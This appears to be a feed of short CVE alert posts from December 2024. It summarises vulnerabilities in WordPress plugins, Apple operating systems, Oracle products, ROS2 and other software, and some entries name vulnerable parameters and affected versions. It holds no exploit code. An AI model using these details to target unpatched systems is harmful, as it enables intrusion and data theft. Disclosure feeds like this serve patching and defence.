🚨 CVE-2023-5625A regression was introduced in the Red Hat build of python-eventlet due to a change in the patch application strategy, resulting in a patch for CVE-2021-21419 not being applied for all builds of all products.🎖@cveNotify |
|
| 2024-12-06 11:37:28 |
🚨 CVE-2023-34968A path disclosure vulnerability was found in Samba. As part of the Spotlight protocol, Samba discloses the server-side absolute path of shares, files, and directories in the results for search queries. This flaw allows a malicious client or an attacker with a targeted RPC request to view the information that is part of the disclosed path.🎖@cveNotify |
|
| 2024-12-06 10:37:33 |
🚨 CVE-2024-11728The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-12-06 10:37:26 |
🚨 CVE-2024-10909The The Pojo Forms plugin for WordPress is vulnerable to arbitrary shortcode execution via form_preview_shortcode AJAX action in all versions up to, and including, 1.4.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. This was partially fixed in version 1.4.8.🎖@cveNotify |
|
| 2024-12-06 10:37:25 |
🚨 CVE-2024-9621A vulnerability was found in Quarkus CXF. Passwords and other secrets may appear in the application log in spite of the user configuring them to be hidden. This issue requires some special configuration to be vulnerable, such as SOAP logging enabled, application set client, and endpoint logging properties, and the attacker must have access to the application log.🎖@cveNotify |
|
| 2024-12-06 09:37:58 |
🚨 CVE-2024-11204The ForumWP – Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘url’ parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-06 09:37:51 |
🚨 CVE-2024-10692The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 via the Content Reveal widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.🎖@cveNotify |
|
| 2024-12-06 09:37:50 |
🚨 CVE-2024-10320The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-06 07:37:38 |
🚨 CVE-2022-45439A pair of spare WiFi credentials is stored in the configuration file of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0 in cleartext. An unauthenticated attacker could use the credentials to access the WLAN service if the configuration file has been retrieved from the device by leveraging another known vulnerability.🎖@cveNotify |
|
| 2024-12-06 06:37:32 |
🚨 CVE-2024-10578The Pubnews theme for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the pubnews_importer_plugin_action_for_notice() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins that can be leveraged to exploit other vulnerabilities.🎖@cveNotify |
|
| 2024-12-06 06:37:25 |
🚨 CVE-2024-8300Dead Code vulnerability in ICONICS GENESIS64 Version 10.97.2, 10.97.2 CFR1, 10.97.2 CRF2 and 10.97.3 and Mitsubishi Electric GENESIS64 Version 10.97.2, 10.97.2 CFR1, 10.97.2 CRF2 and 10.97.3 allows a local authenticated attacker to execute a malicious code by tampering with a specially crafted DLL. This could lead to disclose, tamper with, destroy, or delete information in the affected products, or cause a denial of service (DoS) condition on the products.🎖@cveNotify |
|
| 2024-12-06 06:37:24 |
🚨 CVE-2024-8299Uncontrolled Search Path Element vulnerability in ICONICS GENESIS64 all versions, Mitsubishi Electric GENESIS64 all versions and Mitsubishi Electric MC Works64 all versions allows a local authenticated attacker to execute a malicious code by storing a specially crafted DLL in a specific folder. This could lead to disclose, tamper with, destroy, or delete information in the affected products, or cause a denial of service (DoS) condition on the products.🎖@cveNotify |
|
| 2024-12-06 05:37:24 |
🚨 CVE-2024-11379The Broadcast plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'do_check' parameter in all versions up to, and including, 51.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations.🎖@cveNotify |
|
| 2024-12-06 04:37:44 |
🚨 CVE-2024-10836The Flixita theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.0.82 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-06 04:37:43 |
🚨 CVE-2024-10247The Video Gallery – Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-12-06 03:07:58 |
🚨 CVE-2024-23234An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-12-06 03:07:57 |
🚨 CVE-2023-42834A privacy issue was addressed with improved handling of files. This issue is fixed in watchOS 10.1, macOS Sonoma 14.1, macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-12-06 02:37:35 |
🚨 CVE-2024-23250An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to access Bluetooth-connected microphones without user permission.🎖@cveNotify |
|
| 2024-12-06 02:37:34 |
🚨 CVE-2024-23245This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. Third-party shortcuts may use a legacy action from Automator to send events to apps without user consent.🎖@cveNotify |
|
| 2024-12-06 02:37:30 |
🚨 CVE-2024-23242A privacy issue was addressed by not logging contents of text fields. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to view Mail data.🎖@cveNotify |
|
| 2024-12-06 02:37:29 |
🚨 CVE-2024-23235A race condition was addressed with additional validation. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-06 02:08:03 |
🚨 CVE-2024-23249The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4. Processing a file may lead to a denial-of-service or potentially disclose memory contents.🎖@cveNotify |
|
| 2024-12-06 02:08:02 |
🚨 CVE-2023-45727Proself Enterprise/Standard Edition Ver5.62 and earlier, Proself Gateway Edition Ver1.65 and earlier, and Proself Mail Sanitize Edition Ver1.08 and earlier allow a remote unauthenticated attacker to conduct XML External Entity (XXE) attacks. By processing a specially crafted request containing malformed XML data, arbitrary files on the server containing account information may be read by the attacker.🎖@cveNotify |
|
| 2024-12-06 01:37:27 |
🚨 CVE-2024-10961The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.🎖@cveNotify |
|
| 2024-12-05 23:37:45 |
🚨 CVE-2024-38920Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggerd via remotely sending a request for change the value of dynamic-parameter`/amcl max_beams` .🎖@cveNotify |
|
| 2024-12-05 23:37:44 |
🚨 CVE-2024-37862Buffer Overflow vulnerability in Open Robotic Robotic Operating System 2 ROS2 navigation2- ROS2-humble&& navigation2-humble allows a local attacker to execute arbitrary code via a crafted .yaml file to the nav2_planner process.🎖@cveNotify |
|
| 2024-12-05 23:37:39 |
🚨 CVE-2024-30964Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via the initial_pose_sub thread created by nav2_bt_navigator🎖@cveNotify |
|
| 2024-12-05 23:37:38 |
🚨 CVE-2024-30962Buffer Overflow vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via the nav2_amcl process🎖@cveNotify |
|
| 2024-12-05 23:37:34 |
🚨 CVE-2024-30961Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via the error-thrown mechanism in nav2_bt_navigator.🎖@cveNotify |
|
| 2024-12-05 23:37:33 |
🚨 CVE-2018-9386In reboot_block_command of htc reboot_block driver, there is a possible stack buffer overflow due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-12-05 23:07:25 |
🚨 CVE-2024-26162Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-12-05 22:07:39 |
🚨 CVE-2024-21149Vulnerability in the Oracle Enterprise Asset Management product of Oracle E-Business Suite (component: Work Definition Issues). Supported versions that are affected are 12.2.11-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Enterprise Asset Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Asset Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Asset Management accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2024-12-05 22:07:33 |
🚨 CVE-2024-21143Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: User Management). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-12-05 22:07:32 |
🚨 CVE-2024-21131Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u411, 8u411-perf, 11.0.23, 17.0.11, 21.0.3, 22.0.1; Oracle GraalVM for JDK: 17.0.11, 21.0.3, 22.0.1; Oracle GraalVM Enterprise Edition: 20.3.14 and 21.3.10. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-12-05 22:07:31 |
🚨 CVE-2024-21005Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u401; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-12-05 21:37:32 |
🚨 CVE-2024-22717Cross Site Scripting (XSS) vulnerability in Form Tools 3.1.1 allows attackers to run arbitrary code via the First Name field in the application.🎖@cveNotify |
|
| 2024-12-05 21:37:26 |
🚨 CVE-2024-22085An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. The shadow file is world readable.🎖@cveNotify |
|
| 2024-12-05 21:37:25 |
🚨 CVE-2005-3170The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site.🎖@cveNotify |
|
| 2024-12-05 20:37:55 |
🚨 CVE-2024-53442whapa v1.59 is vulnerable to Command Injection via a crafted filename to the HTML reports component.🎖@cveNotify |
|
| 2024-12-05 20:37:52 |
🚨 CVE-2024-41579DTStack Taier 1.4.0 allows remote attackers to specify the jobName parameter in the console listNames function to cause a SQL injection vulnerability🎖@cveNotify |
|
| 2024-12-05 20:37:51 |
🚨 CVE-2024-10933In OpenBSD 7.5 before errata 009 and OpenBSD 7.4 before errata 022, exclude any '/' in readdir name validation to avoid unexpected directory traversal on untrusted file systems.🎖@cveNotify |
|
| 2024-12-05 20:37:50 |
🚨 CVE-2023-48010STMicroelectronics SPC58 is vulnerable to Missing Protection Mechanism for Alternate Hardware Interface. Code running as Supervisor on the SPC58 PowerPC microcontrollers may disable the System Memory Protection Unit and gain unabridged read/write access to protected assets.🎖@cveNotify |
|
| 2024-12-05 20:37:46 |
🚨 CVE-2024-50947An issue in kmqtt v0.2.7 allows attackers to cause a Denial of Service (DoS) via a crafted request.🎖@cveNotify |
|
| 2024-12-05 20:37:45 |
🚨 CVE-2024-51114An issue in Beijing Digital China Yunke Information Technology Co.Ltd v.7.2.6.120 allows a remote attacker to execute arbitrary code via the code/function/dpi/web_auth/customizable.php file🎖@cveNotify |
|
| 2024-12-05 20:37:43 |
🚨 CVE-2023-49987A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.🎖@cveNotify |
|
| 2024-12-05 20:37:42 |
🚨 CVE-2023-52357Vulnerability of serialization/deserialization mismatch in the vibration framework.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-12-05 20:08:00 |
🚨 CVE-2024-21324Microsoft Defender for IoT Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-12-05 20:07:59 |
🚨 CVE-2024-21323Microsoft Defender for IoT Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-12-05 20:07:58 |
🚨 CVE-2024-21322Microsoft Defender for IoT Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-12-05 20:07:54 |
🚨 CVE-2024-23238An access issue was addressed with improved access restrictions. This issue is fixed in macOS Sonoma 14.4. An app may be able to edit NVRAM variables.🎖@cveNotify |
|
| 2024-12-05 20:07:53 |
🚨 CVE-2024-23233This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4. Entitlements and privacy permissions granted to this app may be used by a malicious app.🎖@cveNotify |
|
| 2024-12-05 20:07:52 |
🚨 CVE-2023-42953A permissions issue was addressed with additional restrictions. This issue is fixed in tvOS 17.1, watchOS 10.1, macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-12-05 20:07:51 |
🚨 CVE-2023-42952The issue was addressed with improved checks. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Ventura 13.6.3, macOS Sonoma 14.1, macOS Monterey 12.7.1. An app with root privileges may be able to access private information.🎖@cveNotify |
|
| 2024-12-05 19:37:38 |
🚨 CVE-2024-12148Incorrect authorization in permission validation component in Devolutions Server 2024.3.6.0 and earlier allows an authenticated user to access some reporting endpoints.🎖@cveNotify |
|
| 2024-12-05 19:37:32 |
🚨 CVE-2018-9393In procfile_write of drivers/misc/mediatek/connectivity/wlan/gen2/os/linux/gl_proc.c, there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-12-05 19:37:31 |
🚨 CVE-2024-26254Microsoft Virtual Machine Bus (VMBus) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-12-05 19:37:30 |
🚨 CVE-2024-26251Microsoft SharePoint Server Spoofing Vulnerability🎖@cveNotify |
|
| 2024-12-05 19:07:51 |
🚨 CVE-2024-11667A directory traversal vulnerability in the web management interface of Zyxel ATP series firmware versions V5.00 through V5.38, USG FLEX series firmware versions V5.00 through V5.38, USG FLEX 50(W) series firmware versions V5.10 through V5.38, and USG20(W)-VPN series firmware versions V5.10 through V5.38 could allow an attacker to download or upload files via a crafted URL.🎖@cveNotify |
|
| 2024-12-05 19:07:50 |
🚨 CVE-2024-28904Microsoft Brokering File System Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-12-05 18:38:24 |
🚨 CVE-2018-9395In mtk_cfg80211_vendor_packet_keep_alive_start and mtk_cfg80211_vendor_set_config of drivers/misc/mediatek/connectivity/wlan/gen2/os/linux/gl_vendor.c, there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-12-05 18:38:17 |
🚨 CVE-2023-23516The issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.7.3, macOS Ventura 13.2, macOS Monterey 12.6.3. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-12-05 18:38:16 |
🚨 CVE-2022-42860This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Monterey 12.6.1, macOS Big Sur 11.7.1, macOS Ventura 13. An app may be able to modify protected parts of the file system🎖@cveNotify |
|
| 2024-12-05 18:07:51 |
🚨 CVE-2024-20792Illustrator versions 28.4, 27.9.3 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-05 17:38:17 |
🚨 CVE-2024-40744Unrestricted file upload via security bypass in Convert Forms component for Joomla in versions before 4.4.8.🎖@cveNotify |
|
| 2024-12-05 17:38:16 |
🚨 CVE-2024-9761Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24477.🎖@cveNotify |
|
| 2024-12-05 17:38:15 |
🚨 CVE-2024-9760Tungsten Automation Power PDF PNG File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PNG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24476.🎖@cveNotify |
|
| 2024-12-05 17:38:12 |
🚨 CVE-2024-23243A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.4 and iPadOS 17.4. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-12-05 17:38:11 |
🚨 CVE-2023-32390The issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, watchOS 9.5, macOS Ventura 13.4. Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup.🎖@cveNotify |
|
| 2024-12-05 17:38:10 |
🚨 CVE-2023-32388A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in watchOS 9.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2024-12-05 17:38:06 |
🚨 CVE-2023-32385A denial-of-service issue was addressed with improved memory handling. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4. Opening a PDF file may lead to unexpected app termination.🎖@cveNotify |
|
| 2024-12-05 17:38:05 |
🚨 CVE-2023-32360An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. An unauthenticated user may be able to access recently printed documents.🎖@cveNotify |
|
| 2024-12-05 17:38:04 |
🚨 CVE-2023-32357An authorization issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to retain access to system configuration files even after its permission is revoked.🎖@cveNotify |
|
| 2024-12-05 17:38:00 |
🚨 CVE-2023-28202This issue was addressed with improved state management. This issue is fixed in iOS 16.5 and iPadOS 16.5, watchOS 9.5, tvOS 16.5, macOS Ventura 13.4. An app firewall setting may not take effect after exiting the Settings app.🎖@cveNotify |
|
| 2024-12-05 16:38:23 |
🚨 CVE-2024-23226The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-12-05 16:38:22 |
🚨 CVE-2023-21513Improper privilege management vulnerability in CC Mode prior to SMR Jun-2023 Release 1 allows physical attackers to manipulate device to operate in way that results in unexpected behavior in CC Mode under specific condition.🎖@cveNotify |
|
| 2024-12-05 16:38:21 |
🚨 CVE-2023-21187In onCreate of UsbAccessoryUriActivity.java, there is a possible way to escape the Setup Wizard due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-246542917🎖@cveNotify |
|
| 2024-12-05 16:38:18 |
🚨 CVE-2023-21176In list_key_entries of utils.rs, there is a possible way to disable user credentials due to resource exhaustion. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-222287335🎖@cveNotify |
|
| 2024-12-05 16:38:17 |
🚨 CVE-2021-31635Server-Side Template Injection (SSTI) vulnerability in jFinal v.4.9.08 allows a remote attacker to execute arbitrary code via the template function.🎖@cveNotify |
|
| 2024-12-05 16:38:16 |
🚨 CVE-2023-32407A logic issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2024-12-05 16:38:12 |
🚨 CVE-2023-32404This issue was addressed with improved entitlements. This issue is fixed in iOS 16.5 and iPadOS 16.5, watchOS 9.5, macOS Ventura 13.4. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2024-12-05 16:38:11 |
🚨 CVE-2023-32400This issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, watchOS 9.5, macOS Ventura 13.4. Entitlements and privacy permissions granted to this app may be used by a malicious app.🎖@cveNotify |
|
| 2024-12-05 16:38:10 |
🚨 CVE-2023-32399The issue was addressed with improved handling of caches. This issue is fixed in iOS 16.5 and iPadOS 16.5, watchOS 9.5, tvOS 16.5, macOS Ventura 13.4. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-12-05 16:38:06 |
🚨 CVE-2023-32395A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-12-05 16:38:05 |
🚨 CVE-2023-32353A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.9 for Windows. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-12-05 15:38:18 |
🚨 CVE-2024-21113Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-12-05 15:38:17 |
🚨 CVE-2024-21111Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-12-05 15:38:16 |
🚨 CVE-2024-21109Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-12-05 15:38:13 |
🚨 CVE-2024-21106Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-12-05 15:38:12 |
🚨 CVE-2024-21082Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: XML Services). Supported versions that are affected are 7.0.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in takeover of Oracle BI Publisher. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-12-05 15:38:11 |
🚨 CVE-2024-21079Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Campaign LOV). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-12-05 15:38:08 |
🚨 CVE-2024-21078Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Campaign LOV). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-12-05 15:38:07 |
